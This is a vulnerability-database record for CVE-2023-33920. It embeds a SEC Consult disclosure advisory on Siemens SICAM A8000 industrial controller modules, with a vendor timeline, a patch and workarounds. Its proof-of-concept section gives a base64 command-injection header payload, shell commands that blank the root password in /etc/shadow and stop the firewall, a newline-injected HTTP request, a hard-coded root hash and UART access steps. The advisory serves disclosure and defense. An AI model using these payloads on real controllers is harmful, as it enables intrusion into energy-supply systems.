https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia

About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck, Christian Hager, Steffen Robertz, Gerhard Hechenberger, Gorazd Jank, Constantin Schieber-Knoebl / @2023

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202306-0923",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "cpci85",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "v05"
      },
      {
        "model": "cp-8031 master module \u003ccpci85",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "siemens",
        "version": "v05"
      },
      {
        "model": "cp-8050 master module \u003ccpci85",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "siemens",
        "version": "v05"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Gerhard Hechenberger, Steffen Robertz, Constantin Schieber-Knoebl, Stefan Viehbock, Gorazd Jank, Christian Hager",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "173370"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-33920",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "CNVD-2023-48553",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "PHYSICAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.9,
            "id": "CVE-2023-33920",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2023-33920",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "productcert@siemens.com",
            "id": "CVE-2023-33920",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2023-48553",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202306-875",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. SEC Consult Vulnerability Lab Security Advisory \u003c 20230703-0 \u003e\n=======================================================================\n               title: Multiple Vulnerabilities including Unauthenticated RCE\n             product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)\n                      Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)\n  vulnerable version: \u003c= V04.92\n       fixed version: CPCI85 V05\n          CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920,\n                      CVE-2023-33921\n              impact: Critical\n            homepage: https://www.siemens.com\n               found: 2023-02-15\n                  by: Stefan Viehb\u00f6ck (Office Vienna)\n                      Christian Hager (Office Vienna)\n                      Steffen Robertz (Office Vienna)\n                      Gerhard Hechenberger (Office Vienna)\n                      Gorazd Jank (Office Vienna)\n                      Constantin Schieber-Knoebl (Office Vienna)\n                      SEC Consult Vulnerability Lab\n\n                      An integrated part of SEC Consult, an Eviden business\n                      Europe | Asia\n\n                      https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"We are a technology company focused on industry, infrastructure,\ntransport, and healthcare. From more resource-efficient factories,\nresilient supply chains, and smarter buildings and grids, to cleaner\nand more comfortable transportation as well as advanced healthcare,\nwe create technology with purpose adding real value for customers.\"\n\nSource: https://new.siemens.com/global/en/company/about.html\n\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately. \nCustomers should update to CPCI85 V05 or later version. \n(https://support.industry.siemens.com/cs/ww/en/view/109804985/)\n\nSEC Consult highly recommends to perform a thorough security review of\nthe product conducted by security professionals to identify and resolve\npotential further security issues. \n\n\nVulnerability overview/description:\n-----------------------------------\n1) Unauthenticated Remote Code Execution (CVE-2023-28489)\nBy sending an HTTP request with a crafted header to port 80/443 of\nthe PLC, arbitrary commands can be executed as system user. The port\nis used to configure and control Siemens PLCs with the Siemens\nToolbox II application and is typically accessible on such devices. \n\n2) Authenticated Command Injection (CVE-2023-33919)\nDue to missing server-side input sanitation, any user with access to\nthe SICAM WEB interface can execute arbitrary commands as user \"root\"\non the device. This works by setting malicious parameters and starting\nan Ethernet package capture. This\npassword hash is the same on all devices. If the corresponding\npassword is known, it could be used to login via UART and SSH. \n\n4) Console Login via UART (CVE-2023-33921)\nThe UART interface can be accessed with physical access to the PCB. \nAfter connecting to the interface, boot information is given and a\nlogin prompt is provided. \n\n\nProof of concept:\n-----------------\n1) Unauthenticated Remote Code Execution (CVE-2023-28489)\nTo exploit this vulnerability, an HTTP request including the command\nmust be crafted. No \"/\" characters can be used, therefore commands\nare encoded as base64, e.g., \"id\" as \"aWQ=\". The command must be\nprovided as UPLOADFILENAME header. A full command looks as follows:\n\n;echo aWQ=| base64 -d | sh #\n\nThe following header format must be obeyed:\n* User-Agent: SICAM TOOLBOX II\n* Session-ID: [ARBITRARY 16 CHARACTERS]\n* UPLOADFILENAME: [COMMAND]\n\nAdditionally, the request body must contain the following POST parameters:\n* type=20\n* length=[ARBITRARY]\n* data=[ARBITRARY]\n\nA valid request can be seen below:\n-----------------------------------------------------------------------\n[ POC request removed ]\n-----------------------------------------------------------------------\n\nIf it worked, the response body will be \"type=21\". Additionally, the\noutput on the UART interface indicates code execution as root user:\n-----------------------------------------------------------------------\nbase64: /ies/IN/_: No such file or directory\nuid=0(root) gid=0(root)\n-----------------------------------------------------------------------\n\nSubsequently, the SSH port can be opened by sending the following\ncommands separately and encoded as base64 string. They will replace\nthe set default root password hash with an empty password hash,\nreconfigure the Dropbear SSH daemon and stop the firewall:\n-----------------------------------------------------------------------\nsed -i\ns\u0027/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\\/FWtDljQjCbm6JnZqxiMg\nre5P14Kv2zAH1:/:32BZgrJ3XBMoY:/\u0027 /etc/shadow\nsed -i s\u0027/\"$DROPBEAR_ARGS -R -s -g\"/\"$DROPBEAR_ARGS -R\"/\u0027 /etc/init.d/dropbear\n/etc/init.d/dropbear restart\n/etc/init.d/rc.firewall stop\n-----------------------------------------------------------------------\n\nAfter this, login via SSH as root is possible:\n-----------------------------------------------------------------------\nssh root@[IP]\nroot@[IP]\u0027s password:\n~# id\nuid=0(root) gid=0(root) groups=0(root),10(wheel)\n~#\n-----------------------------------------------------------------------\n\n\n2) Authenticated Command Injection (CVE-2023-33919)\nTo trigger the command injection vulnerability, the payload must be set in\nthe \"LAN port group\" field on the SICAM WEB page \"Monitoring \u0026 Simulation\"\n-\u003e \"Ethernet Packet Capture\" section \"Capture configuration\"\n(other fields may also be affected). \nAs the web interface only provides a drop-down menu, the payload must\nbe set by manipulating the JavaScript logic or by directly manipulating\nthe HTTP request as below, where \"ping [IP]\\nBBBBBBB\" was set:\n\n-----------------------------------------------------------------------\nPOST /sicweb-ajax/rtum85/cview HTTP/1.1\nHost: [HOST]\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/xml\nSICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT\nContent-Length: 198\nOrigin: http://[HOST]\nConnection: close\nReferer: http://[HOST]/\n\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003cCmd_SetCustomViewValue\u003e\u003cview id=\"packet_capture\"\u003e\u003cparameter id=\"p0\"\u003e\n\u003cvalue\u003e\nping [IP]\nBBBBBBB\u003c/value\u003e\n\u003c/parameter\u003e\u003c/view\u003e\u003c/Cmd_SetCustomViewValue\u003e\n-----------------------------------------------------------------------\n\nThe line break in the payload is especially important, as the command is\nexecuted as part of a shell script. \nThis script is generated and executed by pressing the \"Start/Stop trace\"\nbutton in the \"Capture Controlling\" section and saved as\n/tmp/incws_tcpdump.sh. An excerpt with the injected command is shown\nbelow:\n\n-----------------------------------------------------------------------\n[...] # lets start tcpdump\ntcpdump -i\nping [IP] BBBBBBB \u0027(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)\u0027 -C 1 -W 4 -U -w /var/log/wireshark.pcap \u0026\n[...]\n-----------------------------------------------------------------------\n\nThe executed script creates a process running as root user, which can\nbe seen by running \"ps\" on the device:\n\n-----------------------------------------------------------------------\nroot        1100  0.0  0.1   1784  1168 ?        S    Feb21   0:00 /bin/sh /etc/init.d/rc.sysinit\nroot        1149  0.1  0.3  11768  1748 ?        S1   Feb21   6:03  \\_ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json\n[...]\nwww-data    1487  0.0  0.6   7568  3444 ?        S    Feb21   0:40      \\_ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf\nroot       10655  0.0  0.2   1880  1344 ?        S    04:55   0:00      \\_ /bin/sh /tmp/incws_tcpdump.sh\nroot       10667  0.0  0.2   1884  1360 ?        S    04:57   0:00          \\_ ping [IP]\n-----------------------------------------------------------------------\n\n\n3) Hard-coded Root Password (CVE-2023-33920)\nA hard-coded \"root\" user password hash can be found in the /etc/shadow\nfile:\n-----------------------------------------------------------------------\nroot:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg\nre5P14Kv2zAH1:16436:0:99999:7:::\n-----------------------------------------------------------------------\n\n\n4) Console Login via UART (CVE-2023-33921)\nThe serial console (UART) can be accessed on the backside of the PCB\non two Vias. After removing an additional logic IC, receiving data and\nsending data is possible with the following UART settings:\n* Voltage: 3.3V\n* Speed: 115200 Baud\n* Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1)\nExtensive boot log output can be received. Some output is shown below:\n-----------------------------------------------------------------------\nU-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02)\nBOARD : Altera SOCFPGA Cyclone V Board\nCLOCK: EOSC1 clock 50000 KHz\n[...]\nStarting IES system\n-----------------------------------\nWelcome to SICAM IES\n-----------------------------------\n\nWelcome to\n      _______. __    ______     ___      .___  ___. \n\n\nVulnerable / tested versions:\n-----------------------------\nThe following product has been tested:\n* Siemens A8000 CP-8050 04.92\n* Siemens A8000 CP-8031 04.92\n\n\nVendor contact timeline:\n------------------------\n2023-03-14: Contacting vendor through productcert@siemens.com, sending\n             encrypted advisory\n2023-03-29: Naming researchers involved\n2023-03-31: Requesting state. Vulnerability 1 will be published first\n             due to criticality. Rest will follow. \n2023-04-11: Siemens releases advisory for unauthenticated RCE\n             (Vulnerability 1, CVE-2023-28489)\n2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4\n             (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921)\n2023-06-21: Siemens has additional feedback regarding the contents of the\n             advisory. \n2023-07-03: Release of security advisory. \n\n\nSolution:\n---------\nUpdate to firmware CPCI85 V05 or later version, see vendor advisory\nfor further information:\nhttps://cert-portal.siemens.com/productcert/html/ssa-472454.html\nhttps://cert-portal.siemens.com/productcert/html/ssa-731916.html\n\n\nWorkaround:\n-----------\nRestrict network access to the A8000 CP-8050/CP8031 module or disable the\nToolbox II communication on port 80/443. Make sure to strictly limit\nphysical access to the PLC during and also after its life cycle. \n\n\nAdvisory URL:\n-------------\nhttps://sec-consult.com/vulnerability-lab/\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\nAn integrated part of SEC Consult, an Eviden business\nEurope | Asia\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an\nEviden business. It ensures the continued knowledge gain of SEC Consult in the\nfield of network and application security to stay ahead of the attacker. The\nSEC Consult Vulnerability Lab supports high-quality penetration testing and\nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities\nand valid recommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://sec-consult.com/career/\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://sec-consult.com/contact/\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: security-research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF Stefan Viehb\u00f6ck, Christian Hager, Steffen Robertz, Gerhard Hechenberger,\nGorazd Jank, Constantin Schieber-Knoebl / @2023\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "db": "PACKETSTORM",
        "id": "173370"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-33920",
        "trust": 2.4
      },
      {
        "db": "SIEMENS",
        "id": "SSA-731916",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "173370",
        "trust": 1.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-33920",
        "trust": 0.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-472454",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "db": "PACKETSTORM",
        "id": "173370"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "id": "VAR-202306-0923",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      }
    ]
  },
  "last_update_date": "2024-08-14T12:57:19.909000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Patch for Siemens SICAM A8000 Devices CPCI85 Firmware Hardcoded Credential Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/433471"
      },
      {
        "title": "Siemens CP-8031 Repair measures for trust management problem vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=243861"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://seclists.org/fulldisclosure/2023/jul/14"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/173370/siemens-a8000-cp-8050-cp-8031-code-execution-command-injection.html"
      },
      {
        "trust": 0.7,
        "url": "https://cert-portal.siemens.com/productcert/html/ssa-731916.html"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2023-33920/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/vulnerability-lab/"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/career/"
      },
      {
        "trust": 0.1,
        "url": "https://www.siemens.com"
      },
      {
        "trust": 0.1,
        "url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/)"
      },
      {
        "trust": 0.1,
        "url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
      },
      {
        "trust": 0.1,
        "url": "http://[host]"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-33921"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-33920"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-28489"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://sec-consult.com/contact/"
      },
      {
        "trust": 0.1,
        "url": "http://[host]/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-33919"
      },
      {
        "trust": 0.1,
        "url": "https://new.siemens.com/global/en/company/about.html"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/sec_consult"
      },
      {
        "trust": 0.1,
        "url": "http://blog.sec-consult.com"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "db": "PACKETSTORM",
        "id": "173370"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "db": "PACKETSTORM",
        "id": "173370"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "date": "2023-06-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "date": "2023-07-11T15:36:23",
        "db": "PACKETSTORM",
        "id": "173370"
      },
      {
        "date": "2023-06-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "date": "2023-06-13T09:15:18.677000",
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      },
      {
        "date": "2023-06-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2023-33920"
      },
      {
        "date": "2023-07-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      },
      {
        "date": "2023-07-11T18:15:16.023000",
        "db": "NVD",
        "id": "CVE-2023-33920"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "173370"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Siemens SICAM A8000 Devices CPCI85 Firmware Hardcoded Credential Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2023-48553"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202306-875"
      }
    ],
    "trust": 0.6
  }
}

Action not permitted

cve-2023-33920

Vulnerability from cvelistv5

gsd-2023-33920

Vulnerability from gsd

wid-sec-w-2023-1430

Vulnerability from csaf_certbund

ghsa-mqj9-w9ch-6xmr

Vulnerability from github

var-202306-0923

Vulnerability from variot

Vendor description:

Business recommendation:

Vulnerability overview/description:

Proof of concept:

A valid request can be seen below:

[ POC request removed ]

After this, login via SSH as root is possible:

Welcome to SICAM IES

Vulnerable / tested versions:

Vendor contact timeline:

Solution:

Workaround:

Advisory URL:

Tags